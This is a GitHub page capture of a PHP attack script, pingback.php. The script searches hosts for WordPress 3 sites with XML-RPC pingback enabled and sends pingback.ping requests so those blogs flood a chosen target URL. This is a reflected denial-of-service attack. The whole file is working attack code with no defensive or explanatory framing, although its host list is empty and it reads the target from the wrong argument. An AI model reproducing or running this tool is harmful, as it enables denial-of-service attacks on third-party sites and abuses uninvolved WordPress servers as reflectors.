-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathpingback.php
119 lines (107 loc) · 3.09 KB
/
pingback.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
<?php
if ($argc <= 1) {
echo "Run as the following:\n";
echo "php " . $argv[0] . " targeturl.com\n";
exit(1);
}
// :^)
$hosts = [];
$target = $argv[2];
function has_pingback($url)
{
// TODO: Create a scanner that will check for valid wordpress sites
$payload = '
<?xml version="1.0" encoding="utf-8"?>
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
$response = curl_exec($ch);
curl_close($ch);
return strpos($response, 'pingback.ping') !== false;
}
function is_valid_wordpress($url)
{
// TODO: Create a scanner that will check for valid wordpress sites
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
$response = curl_exec($ch);
curl_close($ch);
return strpos($response, 'WordPress 3') !== false;
}
function pingback($host, $blog_url, $target)
{
// TODO: utilize multisys method to achieve more pingback requests with one HTTP request to xmlrpc.php
$payload = '
<?xml version="1.0" encoding="utf-8"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>' . $target . '</string></value>
</param>
<param>
<value><string>' . $blog_url . '</string></value>
</param>
</params>
</methodCall>
';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $host);
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
curl_exec($ch);
if (!curl_errno($ch)) {
echo "-> sent request to " . $target . " using reflector " . $host . "\n";
}
curl_close($ch);
}
function get_blog_url($url)
{
$endpoint = $url . '/?feed=rss2';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $endpoint);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$response = curl_exec($ch);
curl_close($ch);
preg_match("/<item>.+?<link>(.+?)<\/link>.+?<\/item>/s", $response, $matches);
return sizeof($matches) > 1 ? $matches[1] : NULL;
}
function get_xmlrpc_url($url)
{
return substr($url, -1) == '/' ? $url . 'xmlrpc.php' : $url . '/xmlrpc.php';
}
$vulnerable_hosts = array_filter($hosts, function ($host) {
return (is_string($host)
&& filter_var($host, FILTER_VALIDATE_URL)
&& is_valid_wordpress($host)
&& has_pingback(
get_xmlrpc_url($host)
));
});
$active_reflectors = array_reduce($vulnerable_hosts, function ($acc, $host) {
$pingback_blog_url = get_blog_url($host);
if ($pingback_blog_url == NULL) {
return $acc;
}
$acc[$host] = $pingback_blog_url;
return $acc;
}, []);
array_walk(array_keys($active_reflectors), function ($host) {
global $active_reflectors, $target;
pingback(
get_xmlrpc_url($host),
$active_reflectors[$host],
$target
);
});